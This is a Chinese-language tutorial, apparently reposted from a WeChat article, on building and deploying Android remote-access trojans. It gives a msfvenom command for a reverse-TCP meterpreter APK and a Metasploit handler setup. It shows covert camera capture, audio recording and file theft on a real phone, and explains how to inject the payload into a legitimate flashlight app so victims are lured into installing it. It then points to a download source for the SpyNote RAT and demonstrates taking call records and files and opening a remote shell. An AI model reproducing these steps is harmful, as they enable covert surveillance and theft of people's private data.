作者：Mr wang 来源：https://mp.weixin.qq.com/s/ijU7Z-eSBwENOwH3tMhRFQ

1.实验涉及复现环境 

Kali平台（Hack）：192.168.0.101

Android模拟器（靶机1）：192.168.0.106

Android魅族note2手机（靶机2）：192.168.0.104

Java环境，.net环境构建 。（spyNote软件需要环境）

2.环境配置二Android模拟器

2.1首先从官网上下载雷电模拟器

2.2下载完后。点击.exe文件直接运行安装，运行，下一步，直接完成安装。

2.3 安装完成后在电脑桌面显示下面logo

2.4 对模拟器网络进行配置在右边的设置里面选择设置>网络设置>网络桥接模式开启，ip设置dhcp，最下面点击安装：

2.5 安装成功后显示安装成功：

3.生成后门

3.1打开虚拟机，启动kali,打开终端，生成apk后门。

lhost为windows的ip（可以根据自己的IP设定），lport指定一个端口5001。

打开终端输入命令：

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.101 lport=5001 R > /etc/222.apk

(生成apk文件)

3.2生成文件后我们到/etc/222.apk目录下,

拷贝我们的apk文件,

到我们的windows平台下,然后启动我们的雷电模拟器，点击启动：

(启动界面)

3.3在右下角有个apk,点击选择文件安装。

3.4然后为了测试我们使用模拟器安装apk文件：

4 使用metasploit控制台对模拟器进行攻击：

4.1 启动metasploit：

(启动界面)

4.2 使用模块：use exploit/multi/handler

4.3 设置模块set payload android/meterpreter/reverse_tcp

（paload设置）

4.4 设置攻击机和端口号和启动：

（参数配置）

4.5 显示正在监听靶机：

（监听中）

4.6 回到我们的模拟器靶机，我们点击运行我们安装的文件

（双击运行）

4.7 看到成功返回shell

4.8 查看模拟手机的版本信息：sysinfo

4.9 返回我们的模拟器，启动虚拟终端，查看攻击机和靶机的建立的联系：

5 启用真机测试

5.1 步骤如以上环境，我在自己的手机上安装这个apk文件：

5.2 按照上面获取shell的方法成功连接真机.：

（连接真机成功）

5.3 手机攻击演示：获取版本信息：

5.4查看网络信息：（ifconfig）

(手机网络状态)

5.5查看root状态：

 （显示手机未root）

5.6 启用网页视屏聊天：

（手机未找到合适的浏览器打开）

5.7查看手机有几个摄像头

 （显示有2个）

5.8进行调用摄像头偷拍（默认前置摄像头）：

5.9网页摄像机视屏流

显示实时画面能够调用摄像头，实时观看被攻击者的像机对着的物体，以下为通过此办法获取到的一段图片资料：

5.10 进行录音操作：

 （成功录音并保存）

5.11 获得shell后有很多的攻击方法，我就不一一操作，将其汇总如下：

6 远控升级之捆绑app：

说明：现实生活中没有人会傻乎乎的下载个木马apk文件呀，所以我们的通过一些伪装的办法，将apk木马文件捆绑在用户常用的App上，诱导用户下载使用。

步骤如下：

先捋一下思路，把PAYLOAD小马注入到一个目标apk文件中，

关键是要找到目标APK的入口，并把启动payload小马的代码添加进去，

随目标APK一起启动，从而实现监听手机的目的。

当然前提是apk文件可逆。

这里使用注入目标apk文件：手电筒—-魅族市场下载的(名为shoudiantong.apk)。我们使用上文攻击魅族手机用到的222.apk文件。

6.1 反编译payload小马222.apk和shoudiantong.apk

（说明：反编译软件kali系统中自带，以下操作在windows，所以需要下载一个apktool。

命令：

apktool d houmen.apk

apktool d shoudiantong.apk

6.2 开始寻找手电筒shoudiantong.apk文件的入口，

在手电筒shoudiantong的Manifest.xml文件中查找Main和Launch关键词，定位到所对应的启动smail文件

6.3 直接搜索onCreat函数，找到bundle对象，你并在下面添加启动paload添加如下代码：（改动文件：MainActivety.smail）

6.4 点击保存之后呢，我们还要把刚才反编译的payload文件中的smail代码复制过来，把payload的smail/com/metasploit文件复制到手电筒的smail/com/目录下。

6.5 回编译：apktool b shoudiantong.apk

6.6 签名，这一部需要完成，发现没有签名的apk文件安装时会解析错误，

生成KEYSTORE:keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222

因为我在本机没有这个工具，所以在kali系统完成：

6.7 给shoudiantong.apk签名：

6.8 Shoudiantong.apk木马文件测试,将手电筒apk文件装在手机上：

6.9 打开并正常使用完全没问题：

7 进行手机攻击

7.1 查看手机与攻击机建立的联系

7.2 试着操作一些上述没有操作过的命令试试：

7.3 查看路由信息：

7.4 ps查看进程：

8 总结：

通过对手机木马文件对手机的植入，我们可以成功的对手机进行控制，其中包括对手机使用者进行录音、拍照、查看下载手机私密文件，获取手机网络信息，进程信息等。

实现对手机的完全控制。

本文简单介绍如何将木马文件绑定到正常app实现对受害者攻击，其实还有很多办法，如通过中间人、钓鱼实现木马植入等。

9 图形界面控制软件SpyNote的使用

10 环境配置三java环境和.net环境：

出现以下画面，点击安装，下一步既可以完成安装：

安装完成后，打开cmd,输入java-version出现版本号，说明安装成功：

在搜索框中输入Microsoft .NET Framework，选择【搜索microsoft.com】，点击【搜索】按钮。

打开软件的下载页面，点击【下载】 弹出下载窗口，选择保存位置。

和安装其他软件一样，依次点击【下一步】，直至安装完成。

这时.net运行环境安装完毕，就可以运行之前无法打开的EXE程序文件了

11 spynote安装使用

11.1百度搜索“spynote下载”找到相应的安装包，或者访问地址：

（http://www.rekings.com/spynote-v5-android-rat/）

进行下载下载后使用解压密码：rekings.com打开：

11.2 双击运行软件出现以下界面填写一个大于1023的端口，默认2222

（填写端口）

11.3配置生成木马apk文件，

我这里配置端口：222我们的攻击机为：192.168.0.100也就是我计算机的ip,然后应用的名字test,点击上方的build就可以生成文件：

11.4演示过程涉及一些个人隐私，

所以在演示的过程中我们用上面实验中用到的手机模拟器来代替打开我们的雷电模拟器，点击右下角的apk安装，把我们生成的apk文件安装

（test.apk文件默认放在C:Administratoroutput）：

（安装apk文件）

12 攻击演示：

12.1 回到spyNote软件，我们发现有一台机器成功上线：

12.2 在设备上右击选择 tools P依次有一些命令执行：

（攻击方式）

12.3 我们选择tools p>record calls得到手机的通话记录

（通话记录）

12.4 我们选择tools p>record calls得到手机的通话记录install aplications查看手机的安装的应用软件：

（安装的软件）

12.5 我们选择tools p>file managerke可以查看手机里面的文件，可以任意下载，拷贝，删除等等。

（文件管理）

12.6 我们选择tools p>romote commands可以进行远程终端管理：

（远程终端管理）

13 总结：

功能太多，不一一演示，其中还包括照相、监听电话声音、查看通讯录、发送短信等等一些功能，等于自己手机咯都不用买手机